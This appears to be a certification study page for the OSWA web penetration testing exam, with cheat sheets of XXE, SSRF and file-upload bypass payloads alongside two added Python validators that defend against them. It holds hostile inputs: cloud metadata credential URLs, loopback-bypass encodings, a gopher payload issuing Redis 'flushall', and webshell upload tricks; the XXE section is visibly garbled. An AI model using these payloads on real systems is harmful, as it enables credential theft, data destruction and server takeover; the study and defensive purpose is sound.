OSWA
OffSec

Offensive Security Web Assessor

Intermediate 48hr practical + report Pass: 100+ points $1,499

Web application penetration testing — SQL injection, XSS, SSRF, deserialization.

Issuer: OffSec
Format: 48hr practical + report
Duration: 72 hours total
Pass Score: 100+ points
Valid For: 3y
Cheat Sheets
Injection Attack Payloads

XXE Payloads



]>
&xxe;


]>



  %xxe;
]>


">
%eval;%exfil;

SSRF Payloads & Bypasses

# Cloud metadata
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
http://169.254.169.254/metadata/instance?api-version=2021-02-01

# 127.0.0.1 bypasses
http://0/ http://0.0.0.0/ http://127.1/
http://[::] http://[::1]/
http://①②⑦.①/ (Unicode)
http://0x7f000001/ http://2130706433/
http://127.127.127.127/

# Gopher for Redis
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A

# SSRF to internal scan
http://internal.corp/admin
http://localhost:8080/actuator/env
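The bypass list above only works because most SSRF filters compare the URL string against "127.0.0.1" and "localhost" instead of the address the fetch will actually reach. The validator below is an added defensive example (it is not part of the OSWA material or any OffSec code): it canonicalises every shorthand form in the list (NFKC for the circled digits, the legacy dotted/hex/decimal IPv4 forms, bracketed IPv6, IPv4-mapped IPv6), resolves real hostnames through an injectable resolver, and refuses loopback, link-local (cloud metadata), RFC 1918, unspecified and non-http(s) destinations. Function names, the resolver signature and the sample hostname mappings are assumptions made for this example.

```python
import ipaddress
import socket
import unicodedata
from urllib.parse import urlsplit

# Added defensive example, not from the page: decide on the canonical destination
# address, not on the URL string. Only plain web fetches are allowed (gopher:// etc. fail).
ALLOWED_SCHEMES = {"http", "https"}


def _ipv4_part(part):
    """One dotted component as legacy resolvers read it: 0x.. hex, leading-0 octal, else decimal."""
    try:
        if part[:2].lower() == "0x":
            return int(part[2:] or "0", 16)
        if len(part) > 1 and part[0] == "0":
            return int(part, 8)
        return int(part, 10)
    except ValueError:
        return None


def legacy_ipv4(host):
    """Fold shorthand (127.1, 0, 0x7f000001, 2130706433) onto an IPv4Address; None if not IPv4-like."""
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":
        parts.pop()  # tolerate a trailing dot
    if not 1 <= len(parts) <= 4 or not all(parts):
        return None
    nums = [_ipv4_part(p) for p in parts]
    if any(n is None for n in nums):
        return None
    *lead, last = nums
    # Leading parts are single octets; the last part fills every remaining byte ("127.1" == 127.0.0.1).
    if any(n > 255 for n in lead) or last >= 256 ** (5 - len(nums)):
        return None
    value = last
    for i, n in enumerate(lead):
        value += n << (8 * (3 - i))
    return ipaddress.IPv4Address(value)


def literal_address(host):
    """IP address a host literal denotes after NFKC (so ①②⑦.① becomes 127.1), else None."""
    host = unicodedata.normalize("NFKC", host).strip("[]")
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return legacy_ipv4(host)


def is_internal(addr):
    """True for anything a server-side fetch must never reach."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    return (addr.is_loopback or addr.is_link_local or addr.is_private
            or addr.is_unspecified or addr.is_reserved or addr.is_multicast)


def _dns_resolve(host):
    """Default resolver: every address the system resolver returns for the name (assumed helper)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_outbound_url(url, resolver=_dns_resolve):
    """Return (allowed, reason). `resolver` maps a hostname to IP strings and is injectable for offline tests."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host"
    addr = literal_address(host)
    if addr is not None:
        candidates = [addr]
    else:
        try:
            candidates = [ipaddress.ip_address(ip) for ip in resolver(host)]
        except (OSError, ValueError, LookupError):
            return False, f"cannot resolve {host!r}"
    for a in candidates:
        if is_internal(a):
            return False, f"{host!r} -> {a} is internal"
    return True, "ok"
```

Two caveats worth keeping in mind: a check like this must run on the final destination of every redirect, not only on the first URL, and the fetch itself should connect to the address that was validated (or re-validate at connect time), otherwise a name that resolves to a public address during the check and to 127.0.0.1 a moment later (DNS rebinding) slips through.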

File Upload Bypass Reference

# Extension bypass
.php → .php5 .phtml .phar .php7 .shtml .pwml
# Double extension: shell.jpg.php
# Null byte: shell.php%00.jpg

# MIME bypass (in Burp, change Content-Type:)
image/jpeg, image/png, image/gif

# Magic bytes (prepend to file)
JPEG: \xFF\xD8\xFF
PNG:  \x89PNG\r\n\x1a\n
GIF:  GIF89a

# .htaccess upload to enable PHP
echo "AddType application/x-httpd-php .jpg" > .htaccess
# Upload then shell.jpg

For blind XXE/SSRF, use interactsh-client or Burp Collaborator to detect out-of-band DNS/HTTP callbacks.
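Every entry in the file upload reference above defeats a specific weak control: alternate extensions and double extensions beat extension denylists, a spoofed Content-Type beats MIME checks, prepended magic bytes beat content sniffing, and .htaccess beats "only images are served from here". The validator below is an added defensive example (not part of the OSWA page or any OffSec code) that turns each of those into an allowlist decision and never reuses the client-supplied name on disk. The function names, the accepted image set and the sample inputs in the test are assumptions made for this example.

```python
import re
import secrets

# Added defensive example, not from the page: allowlist-based upload validation.
# Map of accepted extension -> magic-byte prefixes (constructed from the values in the reference above).
MAGIC = {
    "jpg": (b"\xFF\xD8\xFF",),
    "jpeg": (b"\xFF\xD8\xFF",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# One plain token, no dots: "shell.jpg.php" and "shell.php.jpg" both fail this shape check.
STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload(filename, content, declared_type):
    """Return (ok, detail): detail is the canonical extension when ok, otherwise the rejection reason."""
    if "\x00" in filename or "%00" in filename:
        return False, "null byte in filename"
    stem, _, ext = filename.rpartition(".")
    ext = ext.lower()
    if ext not in MAGIC:
        # .php5/.phtml/.phar/.shtml and dotfiles such as .htaccess all land here: the
        # decision is "is this one of ours", never "is this one of the known bad ones".
        return False, f"extension {ext!r} not in allowlist"
    if not STEM.fullmatch(stem):
        return False, "filename stem must be a single plain token"
    expected_type = "image/jpeg" if ext in ("jpg", "jpeg") else f"image/{ext}"
    if declared_type != expected_type:
        # Client-controlled, so only a consistency signal; the byte check below is the real one.
        return False, "Content-Type does not match extension"
    if not any(content.startswith(m) for m in MAGIC[ext]):
        return False, "magic bytes do not match extension"
    return True, "jpg" if ext == "jpeg" else ext


def storage_name(ext):
    """Random stem plus the validated extension; the client's name never reaches the filesystem."""
    return f"{secrets.token_hex(16)}.{ext}"
```

Magic bytes alone prove nothing (the reference shows they are trivially prepended), so the validator treats them as one of several required conditions rather than as proof the file is an image. The control that actually closes the .htaccess case is outside this code: store uploads outside the document root or on a host that serves them as static bytes, and keep AllowOverride None on any directory that can receive user files so a dropped .htaccess has no effect.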